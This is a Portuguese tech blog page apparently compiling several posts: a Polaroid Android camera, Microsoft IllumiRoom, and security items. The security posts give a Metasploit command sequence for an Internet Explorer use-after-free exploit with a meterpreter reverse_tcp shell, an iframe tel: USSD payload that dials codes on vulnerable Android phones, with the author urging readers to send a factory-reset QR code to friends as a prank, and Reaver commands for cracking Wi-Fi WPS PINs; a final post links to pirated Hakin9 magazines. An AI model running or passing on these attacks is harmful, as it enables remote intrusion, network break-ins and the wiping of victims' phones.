Câmera Polaroid com Android 4.1 Jelly Bean

Eu estou sempre torcendo para a Polaroid se reencontrar e voltar a ter destaque no mundo da fotografia e parece que sua nova câmera digital anunciada durante a CES 2013 em Las Vegas é um bom passo para isso.

Polaroid iM1836 Android Camera como o próprio nome já diz, vem com o sistema operacional Android 4.1 Jelly Bean e mais sensor de 18-megapixel, zoom ótico (lente 10-30mm), tela touchscreen de 3.5 polegadas com todos os controles da camêra disponíveis. A câmera tem lentes intercambiáveis como numa DSLR e conexão wi-fi com programa de compartilhamento de fotos em sites sociais e Bluetooth.

Polaroid iM1836 Android Camera deve estar disponível para compra no primeiro semestre de 2013 por US$399. Mais informações no press release.

Fonte:DigitalDrops

Execução de código arbitrário no Microsoft Internet Explorer 6, 7 e 8

Há poucos dias veio à tona, novamente, o Microsoft Internet Explorer, que por sinal temos mais de se acostumar…

A razão é que a Microsoft confirmou que uma vulnerabilidade 0-day afeta o Internet Explorer 6, 7 e 8 (versões 9 e 10 não são afetados).

O problema, a que atribuiu o CVE-2012-4792, é que acessar um objeto na memória que tenha sido removido ou que tenha sido atribuída incorretamente (user-after-free), que permite a execução de código arbitrário com os privilégios do usuário. Esta vulnerabilidade também pode permitir a elevação de privilégio e compromisso de todo o sistema.

Ataques foram detectados exploram essa vulnerabilidade, como a web http://www.cfr.org/ cometido esta semana e, até agora, a Microsoft só oferece uma solução rápida (“Fix it”) para o publicação das atualizações de patches correspondentes newsletter: http://support.microsoft.com/kb/2794220.

Também publicado um exploit no âmbito Metasploit. Acompanha os comandos e um exemplo de gráfico de sua implementação:

use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Microsoft revela tecnologia feita para games chamada IllumiRoom

Quando se trata de inovação, a Microsoft é empresa que mais nos chama a atenção, principalmente nas plataformas de vídeo-game. Como se o Kinect já não bastasse, a empressa de Ballmer criou uma novatecnologiafeita especialmente para seu vídeo-game, TV e sua sala. Trata-se do IllumiRoom, uma tecnologia que promete fazer da sua sala um verdadeiro cenário para se aventurar em um game.

 

Se você ainda não entendeu, imagine você na sua sala jogando vídeo-game, Xbox 360 para ser mais específico, mas além de sua TV, haverá uma tecnologia que fará com que sua sala vire um verdadeiro cenário, pois a imagem se expandirá além da TV.

IllumiRoomMS

É como na imagem acima. A tecnologia foi apresentada durante a CES 2013 por meio de um vídeo que nos mostra como provavelmente será o IllumiRoom.

Imagem de Amostra do You Tube

Como podemos ver acima, não é usado nenhum tipo de óculos para que seja possível visualizar o que se passa na sala, o que deixa a jogabilidade mais confortável. O mais interessante é o ambiente do jogo na sua sala. Pode estar chovendo na tela, mas com o IllumiRoom, sua sala também irá “chover”. Efeitos como explosões também irão além daTV.

IllumiRoomMSS

Essa tecnologia revelada recentemente na CES 2013 nos faz pensar que a próxima geração de consoles pode estar próxima, pois o IllumiRoom pode ser usado no sucessor do Xbox 360, ou até nele mesmo como podemos ver no vídeo. Tudo é possível, mas e você leitor, o que acha disso?

Fonte:Infomaniaco

Perigosa falha para Android

Qualquer aparelho que não esteja rodando pelo menos a versão Jelly Bean pode estar vulnerável. O estrago depende do modelo do aparelho, sendo que a falha mais grave foi apontada em alguns aparelhos Samsung, onde o exploit consegue formatar o aparelho e inutilizar o cartão SIM sem que o usuário possa fazer nada.

O exploit consiste em enviar um URL malicioso para o aparelho da vítima. Pode ser o resultado de uma busca no google, um email, um SMS, um QR code, etc. Qualquer forma de exibir um URL para o usuário funciona. Se o usuário clicar no URL e o aparelho for vulnerável, acabou-se.

O URL vem com um código USSD, desses que a gente usa para acessar opções avançadas do telefone e funciona discando algo como *#66445#*.  O problema é que alguns desses códigos podem ferrar com o telefone e são “discados” sem qualquer pergunta nos telefones vulneráveis.

Você pode testar se seu telefone é vulnerável visitando esta página com ele. O autor do blog, Dylan Reeve, demonstra o problema usando um código USSD inócuo, que só mostra o IMEI do telefone na tela. Eu testei com meu xing-ling Android, Hero H200, e imediatamente ao visitar a página abriu-se o discador e uma janela na frente dele com os dois IMEI do meu telefone. Nenhuma confirmação foi pedida.

A implementação é simples, ao alcance de qualquer “ráquer” wannabe. Bastou colocar isso na página:

<iframe src=”tel:*%2306%23″ />

Quer fazer um teste? Leia este qrcode:

 

 

 

 

 

 

Beleza, ele só mostra o IMEI. e se no lugar do IMEI, eu colocasse um FACTORY RESET?
PERIGO! NÃO FAÇAM ISSO! Se quiser testar o factory reset, leia o QR CODE Abaixo:

QRCode

 

 

 

 

 

 

 

Se quiser sacanear algum amigo, mande esse qrcode ai pra ele! hehehe.. Se ele não tiver um Jelly bean instalado, a amizade vai acabar hehehe.. Cuidado com os QRCODES que voces andam lendo por ai!

Proteção: no momento, a melhor maneira de se proteger é usar o auto-reset blocker. Apesar do nome, o programa ajuda a te proteger de qualquer código USSD malicioso, vindo por qualquer vetor. Ele se instala como um discador e quando o sistema processar um link de telefone, irá abrir uma janela perguntando que discador usar. Escolha o auto-reset blocker. O programa então exibirá qual o número que vai ser discado, dando sua opinião sobre o mesmo (se é seguro ou não), mas deixará por sua conta se vai aceitar ou não a discagem. OBS:  Telstop faz a mesma coisa!

Vulnerabilidade WIFI mediante WPS

WPS ou Wi-Fi Protected Setup como diz a Wikipedia WPS é um padrão promovido por a Wi-Fi Alliance para a criação de redes WLAN seguras. Em outras palavras, WPS não é um mecanismo de segurança por sí só, se trata da definição de diversos mecanismos para facilitar a configuração de una rede WLAN segura com WPA2, pensados para minimizar a intervenção do usuário em ambiente domésticos o pequenas oficinas (SOHO). Concretamente, WPS define os mecanismos a través dos quais os diferentes dispositivos da  rede obtem as credenciais (SSID y PSK) necesarias para iniciar o processo de autenticação.

Vamos ao que interessa, primeiro baixem o Reaver.

Uma vez dentro da pasta onde descargamos Reaver deve-se descomprimi-lo:

airmon-ng start wlan0

wash -i mon0

reaver -i mon0 -b 00:00:00:00:00:00 -vv   (Em este passo os dará o PIN, atentos)

reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv  (Os dará em texto plano a clave)

Este método de pegar a chave resulta um poco pesado, pois pode durar entre 1 e 3 horas dependendo da qualidade do sinal.

Os deixo com este vídeo que me serviu muito para realizar estas provas. E senhores desativem WPS de seus routers.

Para ver um tutorial mais explicado, CLIQUE AQUI

Todas as Hakin9 de 2012

Para quem não sabe, a revista Hakin9 é focada em segurança da informação e, em minha opinião, uma das melhores

Antigamente, a Hakin9 possuía um política bem interessante que dava direito ao download de suas edições anteriores. A quantidade de propaganda na própria revista era bem menor que na atual.

Hoje, as coisas mudaram. Você só consegue baixar algumas edições no mercado paralelo, e ainda corre o risco de receber alguns e-mails com ameaças quanto a processos.

Bom, vamos ao que interessa. O link para download do arquivo é esse aqui. Baixem e logo o material e bons estudos.